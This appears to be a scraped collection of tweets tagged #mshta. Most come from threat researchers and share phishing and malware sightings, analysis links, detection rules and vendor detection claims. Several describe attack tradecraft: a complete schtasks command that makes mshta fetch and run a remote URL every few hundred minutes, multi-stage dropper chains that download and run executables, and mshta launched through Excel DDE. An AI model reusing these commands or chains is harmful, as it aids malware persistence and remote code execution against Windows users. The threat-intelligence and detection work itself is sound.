-
#opendir @UN-themed #phishing #malware site www.sso.unite.un[.]org.joelwisian[.]com hosts ~3 #trojan #droppers + 2 #NorthKorea #macro #powershell #mshta North_Korea.docm (MD5: 5c5bf32736a852c1a1c40d0ae5b8ec33) Ref: https://tinyurl.com/yyffhwun @JAMESWT_MHT - beat me to it lol https://twitter.com/JAMESWT_MHT/status/1177115401400016901 … pic.twitter.com/m1zi60dBqX
-
#LNK: A perfect vector for living-off-the-land attacks, by @Symantec Threat Engineering Team (@threatintel) #infosec #threathunting #lolbins #mshta https://medium.com/threat-intel/lnk-files-living-off-the-land-11c1e2218dc2 … pic.twitter.com/wpP8hw3jCX
-
We're getting evil here.
#AbsoluteZero #MSHTA #payload integrated successfully.
Next one
Encrypted connection. pic.twitter.com/RpPLBSl9fm
-
What Is #Microsoft #Mshta, How Can It Be Used And How To Protect Against It - http://bit.ly/2YiSnM3-Ttx http://www.viruss.eu/
#SecurityPros #CyberDefense #CyberRisks #Vulnerabilities #CyberThreats #CyberAttacks #CyberSecurity #SoftwareFlaws #InfoSec #ApplicationSecurity pic.twitter.com/vJtwhTxufD
-
#Remote #Code #Execution #RCE using #LOLBINs e.g. #mshta #regsvr32 and #wmic native services at #Microsoft #Windows platform. The #Vulnerability can be addressed by changing the default application for files with an #hta extension. #CyberSecurity #CyberAwareness https://twitter.com/McAfee_Labs/status/1155878432326246400 …
-
#revenge #RAT #mshta #powershell #RTF #XML pastebin{.} com/raw/gnYu4MJK > pastebin{.} com/raw/aiahAcur pic.twitter.com/wFCNVVGURs
-
#Schtasks #Mshta "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 500 /tn "MSOFFICEER" /tr "mshta vbscript:CreateObject(\"Wscript[.]Shell\").Run(\"mshta.exe <URL>\",0,true)(window.close)" /F #CyberSecurity #Malware
-
#MSHTA spawned by #SVCHOST as seen in #LethalHTA by yt0ng · Pull Request #102 · Neo23x0/sigma https://github.com/Neo23x0/sigma/pull/102 …
-
Living off the Land (LoL) with #Microsoft, Part II: #Mshta, #HTA, and #Ransomware https://buff.ly/2HuI9Le pic.twitter.com/dWLWctEFs9
-
#PE -> #mshta (/update.drp.su/mustang/tools/run.hta) -> moves window to (-50000, 0), redirects to (/mustang/main.html). It includes ./main.js (#JScript) -> #bitsadmin ( /download.drp.su/soft/ + window.lang === 'ru' ? 'AvastAntivirusB.exe' : 'AvastAntivirusWorldwideE.exe') pic.twitter.com/bfFpAQ9jat
-
New release of #oletools inspired me to investigate #dde capability in #excel. Awesome updt. But is it only about cmd? No. You can run any cmd with #dde. In this example, I show how to use #mshta to run notepad via #dde. limitation: len(cmd name) <= 8 chars @decalage2 @Oddvarmoe pic.twitter.com/7JWKCAXAra
-
#multi #stage: #docx contains external #Relationship elm (#oleObject) -> #rtf doc contains #ole obj --> execs #mshta to dl/exec #hta (#exploit) -> #vbscript runs #powershell to dl #PE file (All external files are hosted on amazon #aws #s3 @AWS_Security) https://www.hybrid-analysis.com/sample/93f29c160c9ead39ebfdc2ba17206ffeb02f0799253e500084b924f74518a68a?environmentId=100 … pic.twitter.com/noaJR6kqwV
-
Like many #ransomware, #Scarab is asking for a #Bitcoin payment after #encrypting files. Scarab is using an encrypted #mshta command to delete #shadow copy. See how #SentinelOne agent is capable of detecting it pre-execution using Static and Behavioural AI https://www.youtube.com/watch?v=4RsTF8ZeoX0&t=11s …
-
Wanna protect school children? Make Schools Hard Targets Again.
#MSHTA #AskingForTheChildren #ParklandShooting pic.twitter.com/ZzJyjzGDxY
-
Looking at telemetry coming from our agents, it seems #malware creators really like using #Mshta, but @sentinelone is catching it #Cybersecurity #Ransomware pic.twitter.com/v09AulI49b
-
#MSHTA #HTML #JavaScript #IE Some facts about mshta.exe: 1. Preventing a window with unsaved data from being closed when … http://juick.com/2835656
-